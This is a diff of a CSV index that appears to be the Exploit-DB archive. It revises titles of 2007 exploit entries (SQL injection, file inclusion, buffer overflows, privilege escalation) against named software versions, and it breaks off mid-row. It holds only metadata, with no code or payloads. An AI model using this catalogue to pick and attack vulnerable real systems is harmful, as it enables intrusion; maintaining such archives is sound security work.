-4429,platforms/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD - SEARCH command Post-Authenticated Overflow",2007-09-19,void,windows,remote,143 +4429,platforms/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD - SEARCH command Post-Authentication Overflow",2007-09-19,void,windows,remote,143 4430,platforms/php/webapps/4430.txt,"Streamline PHP Media Server 1.0-beta4 - Remote File Inclusion",2007-09-19,BiNgZa,php,webapps,0 -4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise Edition 6.0 SP6 - Code Execution Exploit",2007-09-19,shinnai,windows,local,0 +4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise Edition 6.0 SP6 - Code Execution",2007-09-19,shinnai,windows,local,0 4432,platforms/multiple/dos/4432.html,"Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow (PoC)",2007-09-19,"YAG KOHHA",multiple,dos,0 4433,platforms/php/webapps/4433.pl,"OneCMS 2.4 - (userreviews.php abc) SQL Injection",2007-09-19,str0ke,php,webapps,0 -4434,platforms/php/webapps/4434.txt,"phpBB Plus 1.53 - (phpBB_root_path) Remote File Inclusion",2007-09-20,Mehrad,php,webapps,0 -4435,platforms/php/webapps/4435.pl,"Flip 3.0 - Remoe Admin Creation Exploit",2007-09-20,undefined1_,php,webapps,0 +4434,platforms/php/webapps/4434.txt,"phpBB Plus 1.53 - 'phpbb_root_path' Remote File Inclusion",2007-09-20,Mehrad,php,webapps,0 +4435,platforms/php/webapps/4435.pl,"Flip 3.0 - Remote Admin Creation Exploit",2007-09-20,undefined1_,php,webapps,0 4436,platforms/php/webapps/4436.pl,"Flip 3.0 - Remote Password Hash Disclosure Exploit",2007-09-20,undefined1_,php,webapps,0 4437,platforms/linux/remote/4437.c,"Lighttpd 1.4.17 - FastCGI Header Overflow Remote Exploit",2007-09-20,Andi,linux,remote,80 4438,platforms/windows/remote/4438.cpp,"IPSwitch IMail Server 8.0x - Remote Heap Overflow",2007-09-21,axis,windows,remote,25 @@ -4089,7 +4090,7 @@ id,file,description,date,author,platform,type,port 4440,platforms/php/webapps/4440.txt,"Joomla Component com_slideshow - Remote File Inclusion",2007-09-21,ShockShadow,php,webapps,0 4441,platforms/php/webapps/4441.txt,"izicontents rc6 - (Remote File Inclusion / Local File Inclusion) Multiple Vulnerabilities",2007-09-21,irk4z,php,webapps,0 4442,platforms/php/webapps/4442.txt,"CMS Made Simple 1.2 - Remote Code Execution",2007-09-21,irk4z,php,webapps,0 -4443,platforms/php/webapps/4443.txt,"Clansphere 2007.4 - 'cat_id' SQL Injection",2007-09-22,IHTeam,php,webapps,0 +4443,platforms/php/webapps/4443.txt,"ClanSphere 2007.4 - 'cat_id' SQL Injection",2007-09-22,IHTeam,php,webapps,0 4444,platforms/php/webapps/4444.txt,"Black Lily 2007 - 'products.php class' SQL Injection",2007-09-22,VerY-SecReT,php,webapps,0 4445,platforms/windows/remote/4445.html,"EasyMail MessagePrinter Object - (emprint.dll 6.0.1.0) Buffer Overflow Exploit",2007-09-23,rgod,windows,remote,0 4446,platforms/php/webapps/4446.txt,"Wordsmith 1.1b - (config.inc.php _path) Remote File Inclusion",2007-09-23,ShockShadow,php,webapps,0 @@ -4105,11 +4106,11 @@ id,file,description,date,author,platform,type,port 4456,platforms/php/webapps/4456.txt,"FrontAccounting 1.13 - Remote File Inclusion",2007-09-26,kezzap66345,php,webapps,0 4457,platforms/php/webapps/4457.txt,"Softbiz Classifieds PLUS - 'id' SQL Injection",2007-09-26,"Khashayar Fereidani",php,webapps,0 4458,platforms/asp/webapps/4458.txt,"Novus 1.0 - (notas.asp nota_id) SQL Injection",2007-09-26,ka0x,asp,webapps,0 -4459,platforms/php/webapps/4459.txt,"ActiveKB Knowledgebase 2.x - (catId) SQL Injection",2007-09-26,Luna-Tic/XTErner,php,webapps,0 +4459,platforms/php/webapps/4459.txt,"ActiveKB KnowledgeBase 2.x - (catId) SQL Injection",2007-09-26,Luna-Tic/XTErner,php,webapps,0 4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",linux,local,0 4461,platforms/php/webapps/4461.txt,"lustig.cms Beta 2.5 - (forum.php view) Remote File Inclusion",2007-09-27,GoLd_M,php,webapps,0 4462,platforms/php/webapps/4462.txt,"Chupix CMS 0.2.3 - (repertoire) Remote File Inclusion",2007-09-27,0in,php,webapps,0 -4463,platforms/php/webapps/4463.txt,"integramod nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps,0 +4463,platforms/php/webapps/4463.txt,"Integramod nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps,0 4464,platforms/php/webapps/4464.txt,"PhFiTo 1.3.0 - (SRC_PATH) Remote File Inclusion",2007-09-28,w0cker,php,webapps,0 4465,platforms/php/webapps/4465.txt,"public media manager 1.3 - Remote File Inclusion",2007-09-28,0in,php,webapps,0 4466,platforms/php/webapps/4466.php,"Zomplog 3.8.1 - upload_files.php Arbitrary File Upload Exploit",2007-09-28,InATeam,php,webapps,0 @@ -4135,25 +4136,25 @@ id,file,description,date,author,platform,type,port 4486,platforms/asp/webapps/4486.txt,"Furkan Tastan Blog - SQL Injection",2007-10-05,CyberGhost,asp,webapps,0 4487,platforms/windows/remote/4487.html,"Pegasus Imaging ThumbnailXpress 1.0 - Arbitrary File Deletion",2007-10-05,shinnai,windows,remote,0 4488,platforms/windows/remote/4488.html,"Pegasus Imaging ImagXpress 8.0 - Arbitrary File Overwrite",2007-10-05,shinnai,windows,remote,0 -4489,platforms/php/webapps/4489.txt,"joomla panoramic component 1.0 - Remote File Inclusion",2007-10-06,NoGe,php,webapps,0 +4489,platforms/php/webapps/4489.txt,"joomla panoramic Component 1.0 - Remote File Inclusion",2007-10-06,NoGe,php,webapps,0 4490,platforms/php/webapps/4490.txt,"else if CMS 0.6 - Multiple Vulnerabilities",2007-10-06,"HACKERS PAL",php,webapps,0 -4491,platforms/php/webapps/4491.php,"CMS Creamotion - 'securite.php' Remote File Inclusion Exploit",2007-10-06,"HACKERS PAL",php,webapps,0 +4491,platforms/php/webapps/4491.php,"CMS Creamotion - 'securite.php' Remote File Inclusion",2007-10-06,"HACKERS PAL",php,webapps,0 4492,platforms/php/webapps/4492.txt,"Picturesolution 2.1 - (config.php path) Remote File Inclusion",2007-10-06,Mogatil,php,webapps,0 4493,platforms/php/webapps/4493.txt,"SkaDate Online 5.0/6.0 - Remote File Disclosure",2007-10-06,SnIpEr_SA,php,webapps,0 4494,platforms/php/webapps/4494.txt,"Verlihub Control Panel 1.7.x - Local File Inclusion",2007-10-07,TEAMELITE,php,webapps,0 4495,platforms/php/webapps/4495.txt,"idmos-phoenix CMS - 'aural.php' Remote File Inclusion",2007-10-07,"HACKERS PAL",php,webapps,0 4496,platforms/php/webapps/4496.txt,"Joomla Flash Image Gallery Component - Remote File Inclusion",2007-10-07,"Mehmet Ince",php,webapps,0 -4497,platforms/php/webapps/4497.txt,"joomla component wmtportfolio 1.0 - Remote File Inclusion",2007-10-07,NoGe,php,webapps,0 +4497,platforms/php/webapps/4497.txt,"joomla Component wmtportfolio 1.0 - Remote File Inclusion",2007-10-07,NoGe,php,webapps,0 4498,platforms/windows/dos/4498.pl,"WzdFTPD 0.8.0 - (USER) Remote Denial of Service",2007-10-07,k1tk4t,windows,dos,0 -4499,platforms/php/webapps/4499.txt,"joomla component mosmedialite451 - Remote File Inclusion",2007-10-08,k1n9k0ng,php,webapps,0 +4499,platforms/php/webapps/4499.txt,"joomla Component mosmedialite451 - Remote File Inclusion",2007-10-08,k1n9k0ng,php,webapps,0 4500,platforms/php/webapps/4500.txt,"torrenttrader classic 1.07 - Multiple Vulnerabilities",2007-10-08,"HACKERS PAL",php,webapps,0 4501,platforms/php/webapps/4501.php,"PHP Homepage M 1.0 - galerie.php SQL Injection",2007-10-08,"[PHCN] Mahjong",php,webapps,0 4502,platforms/php/webapps/4502.txt,"xKiosk 3.0.1i - (xkurl.php PEARPATH) Remote File Inclusion",2007-10-08,"BorN To K!LL",php,webapps,0 4503,platforms/php/webapps/4503.txt,"LiveAlbum 0.9.0 - common.php Remote File Inclusion",2007-10-08,S.W.A.T.,php,webapps,0 4504,platforms/php/webapps/4504.txt,"Softbiz Jobs & Recruitment - SQL Injection",2007-10-08,"Khashayar Fereidani",php,webapps,0 -4505,platforms/php/webapps/4505.php,"LightBlog 8.4.1.1 - Remote Code Execution Exploit",2007-10-09,BlackHawk,php,webapps,0 +4505,platforms/php/webapps/4505.php,"LightBlog 8.4.1.1 - Remote Code Execution",2007-10-09,BlackHawk,php,webapps,0 4506,platforms/windows/remote/4506.html,"Microsoft Visual FoxPro 6.0 - FPOLE.OCX Arbitrary Command Execution",2007-10-09,shinnai,windows,remote,0 -4507,platforms/php/webapps/4507.txt,"joomla component mp3 allopass 1.0 - Remote File Inclusion",2007-10-10,NoGe,php,webapps,0 +4507,platforms/php/webapps/4507.txt,"joomla Component mp3 allopass 1.0 - Remote File Inclusion",2007-10-10,NoGe,php,webapps,0 4508,platforms/php/webapps/4508.txt,"Joomla Component JContentSubscription 1.5.8 - Multiple Remote File Inclusion",2007-10-10,NoGe,php,webapps,0 4509,platforms/php/webapps/4509.txt,"TikiWiki 1.9.8 - Remote PHP Injection",2007-10-10,ShAnKaR,php,webapps,0 4510,platforms/php/webapps/4510.txt,"Drupal 5.2 - PHP Zend Hash Exploitation Vector",2007-10-10,ShAnKaR,php,webapps,0 @@ -4161,16 +4162,16 @@ id,file,description,date,author,platform,type,port 4512,platforms/php/webapps/4512.txt,"nuseo PHP enterprise 1.6 - Remote File Inclusion",2007-10-10,BiNgZa,php,webapps,0 4513,platforms/php/webapps/4513.php,"PHP-Stats 0.1.9.2 - Multiple Vulnerabilities",2007-10-10,EgiX,php,webapps,0 4514,platforms/linux/remote/4514.c,"Eggdrop Server Module Message Handling - Remote Buffer Overflow Exploit",2007-10-10,bangus/magnum,linux,remote,0 -4515,platforms/solaris/local/4515.c,"Solaris 10 (sparc/x86) - sysinfo Kernel Memory Disclosure Exploit",2007-09-01,qaaz,solaris,local,0 -4516,platforms/solaris/local/4516.c,"Solaris (sparc/x86) - fifofs I_PEEK Kernel Memory Disclosure Exploit",2007-10-10,qaaz,solaris,local,0 -4517,platforms/windows/local/4517.php,"PHP 5.2.4 ionCube extension - safe_mode / disable_functions Bypass",2007-10-11,shinnai,windows,local,0 +4515,platforms/solaris/local/4515.c,"Solaris 10 (SPARC/x86) - sysinfo Kernel Memory Disclosure Exploit",2007-09-01,qaaz,solaris,local,0 +4516,platforms/solaris/local/4516.c,"Solaris (SPARC/x86) - fifofs I_PEEK Kernel Memory Disclosure Exploit",2007-10-10,qaaz,solaris,local,0 +4517,platforms/windows/local/4517.php,"PHP 5.2.4 ionCube extension - Safe_mode / disable_functions Bypass",2007-10-11,shinnai,windows,local,0 4518,platforms/php/webapps/4518.txt,"WebDesktop 0.1 - Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0 4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 - client.php Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0 4520,platforms/php/webapps/4520.txt,"PicoFlat CMS 0.4.14 - 'index.php' Remote File Inclusion",2007-10-11,0in,php,webapps,0 4521,platforms/php/webapps/4521.txt,"Joomla Flash uploader 2.5.1 - Remote File Inclusion",2007-10-11,mdx,php,webapps,0 4522,platforms/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' File Remote Jailbreak Exploit",2007-10-11,"Niacin and Dre",hardware,remote,0 4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 - Newsletter Module SQL Injection",2007-10-11,s4mi,php,webapps,0 -4524,platforms/php/webapps/4524.txt,"joomla component com_colorlab 1.0 - Remote File Inclusion",2007-10-12,"Mehmet Ince",php,webapps,0 +4524,platforms/php/webapps/4524.txt,"joomla Component com_colorlab 1.0 - Remote File Inclusion",2007-10-12,"Mehmet Ince",php,webapps,0 4525,platforms/php/webapps/4525.pl,"TikiWiki 1.9.8 - tiki-graph_formula.php Command Execution Exploit",2007-10-12,str0ke,php,webapps,0 4526,platforms/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method Exploit",2007-10-12,Katatafish,windows,remote,0 4527,platforms/php/webapps/4527.txt,"Softbiz Recipes Portal Script - SQL Injection",2007-10-13,"Khashayar Fereidani",php,webapps,0 @@ -4179,8 +4180,8 @@ id,file,description,date,author,platform,type,port 4530,platforms/multiple/remote/4530.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure Exploit",2007-10-14,eliteboy,multiple,remote,0 4531,platforms/windows/local/4531.py,"jetAudio 7.x - '.m3u' Local SEH Overwrite",2007-10-14,h07,windows,local,0 4532,platforms/linux/dos/4532.pl,"eXtremail 2.1.1 - memmove() Remote Denial of Service",2007-10-15,mu-b,linux,dos,0 -4533,platforms/linux/remote/4533.c,"eXtremail 2.1.1 - (LOGIN) Remote Stack Overflow",2007-10-15,mu-b,linux,remote,4501 -4534,platforms/linux/remote/4534.c,"eXtremail 2.1.1 - PLAIN authentication Remote Stack Overflow",2007-10-15,mu-b,linux,remote,143 +4533,platforms/linux/remote/4533.c,"eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow",2007-10-15,mu-b,linux,remote,4501 +4534,platforms/linux/remote/4534.c,"eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow",2007-10-15,mu-b,linux,remote,143 4535,platforms/linux/dos/4535.pl,"eXtremail 2.1.1 - Remote Heap Overflow (PoC)",2007-10-15,mu-b,linux,dos,0 4536,platforms/php/webapps/4536.txt,"doop CMS 1.3.7 - (page) Local File Inclusion",2007-10-15,vladii,php,webapps,0 4537,platforms/linux/remote/4537.c,"Subversion 0.3.7/1.0.0 - Remote Buffer Overflow",2005-05-03,greuff,linux,remote,0 @@ -4199,16 +4200,16 @@ id,file,description,date,author,platform,type,port 4550,platforms/php/webapps/4550.pl,"BBPortalS 2.0 - Blind SQL Injection",2007-10-21,Max007,php,webapps,0 4551,platforms/php/webapps/4551.txt,"PeopleAggregator 1.2pre6-release-53 - Multiple Remote File Inclusion",2007-10-21,GoLd_M,php,webapps,0 4552,platforms/linux/remote/4552.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure Exploit (SSL)",2007-10-21,h3rcul3s,linux,remote,0 -4553,platforms/windows/local/4553.php,"PHP 5.x - COM functions safe_mode and disable_function bypass",2007-10-22,shinnai,windows,local,0 -4554,platforms/php/webapps/4554.txt,"SocketMail 2.2.8 - fnc-readmail3.php Remote File Inclusion",2007-10-22,BiNgZa,php,webapps,0 +4553,platforms/windows/local/4553.php,"PHP 5.x - COM functions Safe_mode and disable_function Bypass",2007-10-22,shinnai,windows,local,0 +4554,platforms/php/webapps/4554.txt,"Socketmail 2.2.8 - fnc-readmail3.php Remote File Inclusion",2007-10-22,BiNgZa,php,webapps,0 4555,platforms/php/webapps/4555.txt,"TOWeLS 0.1 - scripture.php Remote File Inclusion",2007-10-22,GoLd_M,php,webapps,0 -4556,platforms/multiple/remote/4556.txt,"LiteSpeed Web Server 3.2.3 - Source Code Disclosure",2007-10-22,Tr3mbl3r,multiple,remote,0 +4556,platforms/multiple/remote/4556.txt,"Litespeed Web Server 3.2.3 - Source Code Disclosure",2007-10-22,Tr3mbl3r,multiple,remote,0 4557,platforms/php/webapps/4557.txt,"Simple PHP Blog (sPHPblog) 0.5.1 - Multiple Vulnerabilities",2007-10-22,DarkFig,php,webapps,0 4558,platforms/php/webapps/4558.txt,"InstaGuide Weather Script 1.0 - 'index.php' Local File Inclusion",2007-10-22,"BorN To K!LL",php,webapps,0 4559,platforms/multiple/dos/4559.txt,"Mozilla Firefox 2.0.0.7 - Remote Denial of Service",2007-10-22,BugReport.IR,multiple,dos,0 4560,platforms/multiple/dos/4560.pl,"DNS Recursion Bandwidth Amplification - Denial of Service (PoC)",2007-10-23,ShadowHatesYou,multiple,dos,0 4561,platforms/php/webapps/4561.txt,"Flatnuke 3 - Remote Command Execution / Privilege Escalation",2007-10-23,KiNgOfThEwOrLd,php,webapps,0 -4562,platforms/php/webapps/4562.txt,"Flatnuke 3 - Remote Cookie Manipoulation / Privilege Escalation",2007-10-23,KiNgOfThEwOrLd,php,webapps,0 +4562,platforms/php/webapps/4562.txt,"Flatnuke 3 - Remote Cookie Manipulation/ Privilege Escalation",2007-10-23,KiNgOfThEwOrLd,php,webapps,0 4563,platforms/php/webapps/4563.txt,"PHP-Nuke platinum 7.6.b.5 - Remote File Inclusion",2007-10-23,BiNgZa,php,webapps,0 4564,platforms/multiple/local/4564.txt,"Oracle 10g - CTX_DOC.MARKUP SQL Injection",2007-10-23,sh2kerr,multiple,local,0 4565,platforms/php/webapps/4565.txt,"PHP Image 1.2 - Multiple Remote File Inclusion",2007-10-23,Civi,php,webapps,0 @@ -4221,9 +4222,9 @@ id,file,description,date,author,platform,type,port 4572,platforms/multiple/local/4572.txt,"Oracle 10g - LT.FINDRICSET SQL Injection (IDS evasion)",2007-10-27,sh2kerr,multiple,local,0 4573,platforms/windows/remote/4573.py,"IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow Exploit",2007-10-27,muts,windows,remote,1581 4574,platforms/windows/remote/4574.pl,"IBM Lotus Domino 7.0.2FP1 - IMAP4 Server LSUB Command Exploit",2007-10-27,FistFuXXer,windows,remote,143 -4575,platforms/php/webapps/4575.txt,"GoSamba 1.0.1 - (include_path) Multiple Remote File Inclusion",2007-10-27,GoLd_M,php,webapps,0 +4575,platforms/php/webapps/4575.txt,"GoSamba 1.0.1 - 'INCLUDE_PATH' Multiple Remote File Inclusion",2007-10-27,GoLd_M,php,webapps,0 4576,platforms/php/webapps/4576.txt,"JobSite Professional 2.0 - file.php SQL Injection",2007-10-28,ZynbER,php,webapps,0 -4577,platforms/php/webapps/4577.txt,"CaupoShop Pro 2.x - (action) Remote File Inclusion",2007-10-28,mozi,php,webapps,0 +4577,platforms/php/webapps/4577.txt,"CaupoShop Pro 2.x - 'action' Remote File Inclusion",2007-10-28,mozi,php,webapps,0 4578,platforms/asp/webapps/4578.txt,"emagiC CMS.Net 4.0 - (emc.asp) SQL Injection",2007-10-28,hak3r-b0y,asp,webapps,0 4579,platforms/windows/remote/4579.html,"GOM Player 2.1.6.3499 - (GomWeb3.dll 1.0.0.12) Remote Overflow",2007-10-29,rgod,windows,remote,0 4580,platforms/php/webapps/4580.txt,"FireConfig 0.5 - (dl.php) Remote File Disclosure",2007-10-28,GoLd_M,php,webapps,0 @@ -4238,11 +4239,11 @@ id,file,description,date,author,platform,type,port 4589,platforms/php/webapps/4589.htm,"PHP-AGTC membership system 1.1a - Remote Add Admin Exploit",2007-10-30,0x90,php,webapps,0 4591,platforms/php/webapps/4591.txt,"ModuleBuilder 1.0 - (file) Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0 4592,platforms/php/webapps/4592.txt,"ISPworker 1.21 - download.php Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0 -4593,platforms/php/webapps/4593.txt,"Wordpress Plugin BackUpWordpress 0.4.2b - Remote File Inclusion",2007-11-01,S.W.A.T.,php,webapps,0 +4593,platforms/php/webapps/4593.txt,"WordPress Plugin BackUpWordPress 0.4.2b - Remote File Inclusion",2007-11-01,S.W.A.T.,php,webapps,0 4594,platforms/windows/remote/4594.html,"SonicWALL SSL-VPN - NeLaunchCtrl ActiveX Control Remote Exploit",2007-11-01,krafty,windows,remote,0 4595,platforms/php/webapps/4595.txt,"Synergiser 1.2 RC1 - Local File Inclusion / Full Path Disclosure",2007-11-02,KiNgOfThEwOrLd,php,webapps,0 4596,platforms/php/webapps/4596.txt,"Scribe 0.2 - Remote PHP Code Execution",2007-11-02,KiNgOfThEwOrLd,php,webapps,0 -4597,platforms/php/webapps/4597.txt,"DM GuestBook 0.4.1 - Multiple Local File Inclusion",2007-11-02,GoLd_M,php,webapps,0 +4597,platforms/php/webapps/4597.txt,"DM Guestbook 0.4.1 - Multiple Local File Inclusion",2007-11-02,GoLd_M,php,webapps,0 4598,platforms/windows/remote/4598.html,"EDraw Flowchart ActiveX Control 2.0 - Insecure Method Exploit",2007-11-02,shinnai,windows,remote,0 4599,platforms/php/webapps/4599.txt,"Ax Developer CMS 0.1.1 - (index.php module) Local File Inclusion",2007-11-02,GoLd_M,php,webapps,0 4600,platforms/linux/dos/4600.py,"Firefly Media Server 0.2.4 - Remote Denial of Service",2007-11-02,nnp,linux,dos,0 @@ -4252,8 +4253,8 @@ id,file,description,date,author,platform,type,port 4604,platforms/php/webapps/4604.txt,"scWiki 1.0 Beta 2 - (common.php pathdot) Remote File Inclusion",2007-11-03,GoLd_M,php,webapps,0 4605,platforms/php/webapps/4605.txt,"Vortex Portal 1.0.42 - Remote File Inclusion",2007-11-04,ShAy6oOoN,php,webapps,0 4606,platforms/php/webapps/4606.txt,"nuBoard 0.5 - (index.php site) Remote File Inclusion",2007-11-04,GoLd_M,php,webapps,0 -4607,platforms/php/webapps/4607.txt,"syndeoCMS 2.5.01 - (cmsdir) Remote File Inclusion",2007-11-04,mdx,php,webapps,0 -4608,platforms/php/webapps/4608.php,"JBC Explorer 7.20 RC 1 - Remote Code Execution Exploit",2007-11-05,DarkFig,php,webapps,0 +4607,platforms/php/webapps/4607.txt,"SyndeoCMS 2.5.01 - (cmsdir) Remote File Inclusion",2007-11-04,mdx,php,webapps,0 +4608,platforms/php/webapps/4608.php,"JBC Explorer 7.20 RC 1 - Remote Code Execution",2007-11-05,DarkFig,php,webapps,0 4609,platforms/asp/webapps/4609.txt,"ASP Message Board 2.2.1c - SQL Injection",2007-11-05,Q7x,asp,webapps,0 4610,platforms/windows/dos/4610.html,"Viewpoint Media Player for IE 3.2 - Remote Stack Overflow (PoC)",2007-11-06,shinnai,windows,dos,0 4611,platforms/php/webapps/4611.txt,"jPORTAL 2 - mailer.php SQL Injection",2007-11-06,Kacper,php,webapps,0 @@ -4269,24 +4270,24 @@ id,file,description,date,author,platform,type,port 4621,platforms/php/webapps/4621.txt,"patBBcode 1.0 - bbcodeSource.php Remote File Inclusion",2007-11-12,p4sswd,php,webapps,0 4622,platforms/php/webapps/4622.txt,"Myspace Clone Script - SQL Injection",2007-11-13,t0pP8uZz,php,webapps,0 4623,platforms/php/webapps/4623.txt,"Toko Instan 7.6 - Multiple SQL Injections",2007-11-14,k1tk4t,php,webapps,0 -4624,platforms/osx/dos/4624.c,"Apple Mac OSX 10.4.x Kernel - i386_set_ldt() Integer Overflow (PoC)",2007-11-16,"RISE Security",osx,dos,0 -4625,platforms/windows/local/4625.txt,"Microsoft Jet Engine - .MDB File Parsing Stack Overflow (PoC)",2007-11-16,cocoruder,windows,local,0 +4624,platforms/osx/dos/4624.c,"Apple Mac OS X 10.4.x - Kernel i386_set_ldt() Integer Overflow (PoC)",2007-11-16,"RISE Security",osx,dos,0 +4625,platforms/windows/local/4625.txt,"Microsoft Jet Engine - '.MDB' File Parsing Stack Overflow (PoC)",2007-11-16,cocoruder,windows,local,0 4626,platforms/php/webapps/4626.txt,"Joomla Component Carousel Flash Image Gallery - Remote File Inclusion",2007-11-16,Crackers_Child,php,webapps,0 4627,platforms/php/webapps/4627.txt,"ProfileCMS 1.0 - 'id' SQL Injection",2007-11-16,K-159,php,webapps,0 4628,platforms/php/webapps/4628.txt,"Myspace Clone Script - 'index.php' Remote File Inclusion",2007-11-16,VerY-SecReT,php,webapps,0 4629,platforms/php/webapps/4629.txt,"net-finity - 'links.php' SQL Injection",2007-11-16,VerY-SecReT,php,webapps,0 4630,platforms/php/webapps/4630.txt,"meBiblio 0.4.5 - (index.php action) Remote File Inclusion",2007-11-17,ShAy6oOoN,php,webapps,0 -4631,platforms/php/webapps/4631.txt,"phpBBViet 02.03.2007 - (phpbb_root_path) Remote File Inclusion",2007-11-17,"Mehmet Ince",php,webapps,0 -4632,platforms/php/webapps/4632.txt,"vigilecms 1.4 - Multiple Vulnerabilities",2007-11-18,DevilAuron,php,webapps,0 +4631,platforms/php/webapps/4631.txt,"phpBBViet 02.03.2007 - 'phpbb_root_path' Remote File Inclusion",2007-11-17,"Mehmet Ince",php,webapps,0 +4632,platforms/php/webapps/4632.txt,"VigileCMS 1.4 - Multiple Vulnerabilities",2007-11-18,DevilAuron,php,webapps,0 4633,platforms/php/webapps/4633.txt,"HotScripts Clone Script - SQL Injection",2007-11-18,t0pP8uZz,php,webapps,0 4634,platforms/php/webapps/4634.php,"IceBB 1.0-rc6 - Remote Database Authentication Details Exploit",2007-11-18,Gu1ll4um3r0m41n,php,webapps,0 4635,platforms/php/webapps/4635.php,"Sciurus Hosting Panel - Remote Code Injection",2007-11-18,Liz0ziM,php,webapps,0 -4636,platforms/php/webapps/4636.txt,"joomla component juser 1.0.14 - Remote File Inclusion",2007-11-19,NoGe,php,webapps,0 +4636,platforms/php/webapps/4636.txt,"joomla Component juser 1.0.14 - Remote File Inclusion",2007-11-19,NoGe,php,webapps,0 4637,platforms/php/webapps/4637.txt,"bcoos 1.0.10 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2007-11-20,BugReport.IR,php,webapps,0 4638,platforms/php/webapps/4638.txt,"skyportal vrc6 - Multiple Vulnerabilities",2007-11-20,BugReport.IR,php,webapps,0 4639,platforms/php/webapps/4639.htm,"Ucms 1.8 - Backdoor Remote Command Execution Exploit",2007-11-21,D4m14n,php,webapps,0 4640,platforms/php/webapps/4640.txt,"TalkBack 2.2.7 - Multiple Remote File Inclusion",2007-11-21,NoGe,php,webapps,0 -4641,platforms/php/webapps/4641.txt,"alstrasoft E-Friends 4.98 - (seid) Multiple SQL Injection",2007-11-21,K-159,php,webapps,0 +4641,platforms/php/webapps/4641.txt,"Alstrasoft e-Friends 4.98 - (seid) Multiple SQL Injection",2007-11-21,K-159,php,webapps,0 4642,platforms/php/webapps/4642.txt,"DevMass Shopping Cart 1.0 - Remote File Inclusion",2007-11-22,S.W.A.T.,php,webapps,0 4643,platforms/php/webapps/4643.py,"VigileCMS 1.8 - Stealth Remote Command Execution Exploit",2007-11-22,The:Paradox,php,webapps,0 4644,platforms/asp/webapps/4644.txt,"NetAuctionHelp 4.1 - (nsearch) SQL Injection",2007-11-22,"Aria-Security Team",asp,webapps,0 @@ -4296,7 +4297,7 @@ id,file,description,date,author,platform,type,port 4648,platforms/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 - RTSP Response Remote SEH Overwrite (PoC)",2007-11-23,h07,multiple,dos,0 4649,platforms/php/webapps/4649.txt,"Irola My-Time 3.5 - SQL Injection",2007-11-23,"Aria-Security Team",php,webapps,0 4650,platforms/php/webapps/4650.txt,"Mp3 ToolBox 1.0 Beta 5 - (skin_file) Remote File Inclusion",2007-11-23,Crackers_Child,php,webapps,0 -4651,platforms/windows/remote/4651.cpp,"Apple QuickTime 7.2/7.3 - RSTP Response Code Execution Exploit (Vista/XP)",2007-11-24,InTeL,windows,remote,0 +4651,platforms/windows/remote/4651.cpp,"Apple QuickTime 7.2/7.3 - RSTP Response Code Execution (Vista/XP)",2007-11-24,InTeL,windows,remote,0 4652,platforms/php/webapps/4652.txt,"Amber Script 1.0 - (show_content.php id) Local File Inclusion",2007-11-24,Crackers_Child,php,webapps,0 4653,platforms/php/webapps/4653.txt,"WorkingOnWeb 2.0.1400 - events.php SQL Injection",2007-11-24,ka0x,php,webapps,0 4654,platforms/php/webapps/4654.txt,"PBLang 4.99.17.q - Remote File Rewriting / Command Execution",2007-11-24,KiNgOfThEwOrLd,php,webapps,0 @@ -4318,7 +4319,7 @@ id,file,description,date,author,platform,type,port 4670,platforms/php/webapps/4670.txt,"PHP-CON 1.3 - (include.php) Remote File Inclusion",2007-11-28,GoLd_M,php,webapps,0 4671,platforms/php/webapps/4671.txt,"EHCP 0.22.8 - Multiple Remote File Inclusion",2007-11-28,MhZ91,php,webapps,0 4672,platforms/php/webapps/4672.txt,"Charrays CMS 0.9.3 - Multiple Remote File Inclusion",2007-11-28,MhZ91,php,webapps,0 -4673,platforms/multiple/remote/4673.rb,"Apple QuickTime 7.2/7.3 (OSX/Windows) - RSTP Response Universal Exploit",2007-11-29,"Subreption LLC.",multiple,remote,0 +4673,platforms/multiple/remote/4673.rb,"Apple QuickTime 7.2/7.3 (OS X/Windows) - RSTP Response Universal Exploit",2007-11-29,"Subreption LLC.",multiple,remote,0 4674,platforms/php/webapps/4674.txt,"TuMusika Evolution 1.7R5 - Remote File Disclosure",2007-11-28,GoLd_M,php,webapps,0 4675,platforms/php/webapps/4675.txt,"NoAh 0.9 pre 1.2 - (filepath) Remote File Disclosure",2007-11-28,GoLd_M,php,webapps,0 4676,platforms/php/webapps/4676.txt,"Web-MeetMe 3.0.3 - (play.php) Remote File Disclosure",2007-11-29,Evil.Man,php,webapps,0 @@ -4327,27 +4328,27 @@ id,file,description,date,author,platform,type,port 4679,platforms/php/webapps/4679.txt,"KML share 1.1 - (region.php layer) Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 4680,platforms/php/webapps/4680.txt,"LearnLoop 2.0beta7 - (sFilePath) Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 4681,platforms/php/webapps/4681.txt,"ftp Admin 0.1.0 - (Local File Inclusion / Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities",2007-11-29,Omni,php,webapps,0 -4682,platforms/windows/dos/4682.c,"Windows Media Player - AIFF Divide By Zero Exception Denial of Service (PoC)",2007-11-29,"Gil-Dong / Woo-Chi",windows,dos,0 +4682,platforms/windows/dos/4682.c,"Microsoft Windows Media Player - AIFF Divide By Zero Exception Denial of Service (PoC)",2007-11-29,"Gil-Dong / 